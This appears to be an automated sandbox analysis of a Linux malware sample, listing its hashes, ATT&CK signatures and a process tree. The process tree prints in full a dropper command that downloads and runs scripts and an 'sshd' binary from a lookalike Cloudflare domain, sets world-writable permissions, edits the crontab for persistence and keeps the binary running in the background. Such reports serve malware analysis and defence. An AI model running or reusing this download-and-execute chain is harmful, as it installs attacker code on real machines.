Analysis
-
max time kernel
1s -
max time network
136s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20241127-en -
resource tags
-
submitted
21-12-2024 17:23
General
-
Target
ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d.bin
-
Size
1KB
-
MD5
f105102404cda7e7de2ac1ae54d9a78c
-
SHA1
8ff5bcf2c69056780f0a7b51c96bba243dca2201
-
SHA256
ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d
-
SHA512
587541b47ea669cd3a5cf952ed678b2399c9be0511455b3ac8476072fcb7a713489405a7f35506b7197674678350ead3437847d513fb63f4f8a9db447f99c92c
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs
Execute scripts via Unix Shell.
Processes
-
/tmp/ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d.bin/tmp/ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d.bin1⤵
-
/bin/sh/bin/sh -c "wget -nc http://dash.cloudflare.ovh/dns/unix.sh -q -P /var/tmp/; chmod 777 /var/tmp/unix.sh; curl http://dash.cloudflare.ovh/dns/unix.sh -s -o /var/tmp/unix.sh; chmod 777 /var/tmp/unix.sh; cd /var/tmp; ./unix.sh; cd /var/tmp; rm unix.sh; wget -nc http://dash.cloudflare.ovh/dns/sshd -q -P /var/tmp/; chmod 777 /var/tmp/sshd; curl http://dash.cloudflare.ovh/dns/sshd -s -o /var/tmp/sshd; chmod 777 /var/tmp/sshd; wget -nc http://dash.cloudflare.ovh/dns/config.json -q -P /var/tmp/; curl http://dash.cloudflare.ovh/dns/config.json -s -o /var/tmp/config.json; crontab -l 2>/dev/null | grep -qxF '' || (crontab -l 2>/dev/null ; echo '') | crontab -; wget -nc http://dash.cloudflare.ovh/dns/truct.sh -q -P /var/tmp/; chmod 777 /var/tmp/truct.sh; curl http://dash.cloudflare.ovh/dns/truct.sh -s -o /var/tmp/truct.sh; chmod 777 /var/tmp/truct.sh; cd /var/tmp; ./truct.sh 2>/dev/null; cd /var/tmp; rm truct.sh; wget -nc http://dash.cloudflare.ovh/dns/brict.sh -q -P /var/tmp/; chmod 777 /var/tmp/brict.sh; curl http://dash.cloudflare.ovh/dns/brict.sh -s -o /var/tmp/brict.sh; chmod 777 /var/tmp/brict.sh; cd /var/tmp; ./brict.sh 2>/dev/null; cd /var/tmp; rm brict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'; wget -nc http://dash.cloudflare.ovh/dns/retrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/retrict.sh; curl http://dash.cloudflare.ovh/dns/retrict.sh -s -o /var/tmp/retrict.sh; chmod 777 /var/tmp/retrict.sh; cd /var/tmp; ./retrict.sh 2>/dev/null; cd /var/tmp; rm retrict.sh; wget -nc http://dash.cloudflare.ovh/dns/politrict.sh -q -P /var/tmp/; chmod 777 /var/tmp/politrict.sh; curl http://dash.cloudflare.ovh/dns/politrict.sh -s -o /var/tmp/politrict.sh; chmod 777 /var/tmp/politrict.sh; cd /var/tmp; ./politrict.sh 2>/dev/null; cd /var/tmp; rm politrict.sh; /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &'"1⤵
- File and Directory Permissions Modification
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/dns/unix.sh -q -P /var/tmp/2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/unix.sh2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/dns/unix.sh -s -o /var/tmp/unix.sh2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/unix.sh2⤵
- File and Directory Permissions Modification
-
-
/var/tmp/unix.sh./unix.sh2⤵
-
-
/usr/bin/rmrm unix.sh2⤵
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/dns/sshd -q -P /var/tmp/2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/sshd2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/dns/sshd -s -o /var/tmp/sshd2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/sshd2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/dns/config.json -q -P /var/tmp/2⤵
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/dns/config.json -s -o /var/tmp/config.json2⤵
-
-
/usr/bin/grepgrep -qxF2⤵
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
-
-
/usr/bin/crontabcrontab -l2⤵
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/dns/truct.sh -q -P /var/tmp/2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/truct.sh2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/dns/truct.sh -s -o /var/tmp/truct.sh2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/truct.sh2⤵
- File and Directory Permissions Modification
-
-
/var/tmp/truct.sh./truct.sh2⤵
-
-
/usr/bin/rmrm truct.sh2⤵
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/dns/brict.sh -q -P /var/tmp/2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/brict.sh2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/dns/brict.sh -s -o /var/tmp/brict.sh2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/brict.sh2⤵
- File and Directory Permissions Modification
-
-
/var/tmp/brict.sh./brict.sh2⤵
-
-
/usr/bin/rmrm brict.sh2⤵
-
-
/usr/bin/flock/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"2⤵
-
/bin/sh/bin/sh -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"3⤵
- Command and Scripting Interpreter: Unix Shell
-
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/dns/retrict.sh -q -P /var/tmp/2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/retrict.sh2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/dns/retrict.sh -s -o /var/tmp/retrict.sh2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/retrict.sh2⤵
- File and Directory Permissions Modification
-
-
/var/tmp/retrict.sh./retrict.sh2⤵
-
-
/usr/bin/rmrm retrict.sh2⤵
-
-
/usr/bin/wgetwget -nc http://dash.cloudflare.ovh/dns/politrict.sh -q -P /var/tmp/2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/politrict.sh2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/curlcurl http://dash.cloudflare.ovh/dns/politrict.sh -s -o /var/tmp/politrict.sh2⤵
-
-
/usr/bin/chmodchmod 777 /var/tmp/politrict.sh2⤵
- File and Directory Permissions Modification
-
-
/var/tmp/politrict.sh./politrict.sh2⤵
-
-
/usr/bin/rmrm politrict.sh2⤵
-
-
/usr/bin/flock/usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"2⤵
-
/bin/sh/bin/sh -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"3⤵
- Command and Scripting Interpreter: Unix Shell
-
-
-
/usr/bin/nohupnohup ./sshd1⤵
-
/var/tmp/sshd./sshd1⤵
-
/usr/bin/nohupnohup ./sshd1⤵
-
/var/tmp/sshd./sshd1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176B
MD567b6668ae3b2e39c724ebae860d319d3
SHA1f9bf92862a8bf444655aed26b3a3cdce340e41c6
SHA25642a862b651aa1a1699096052352f63fbe262d76c546834a621d616b10805f4f0
SHA5123b855cfa64f130fd3c95300418fce40802007c047259d44a515c7dd8929d86342da6251ddff83f32abd691efb5df77cdd34065cad0bd204c6238eb79999435fe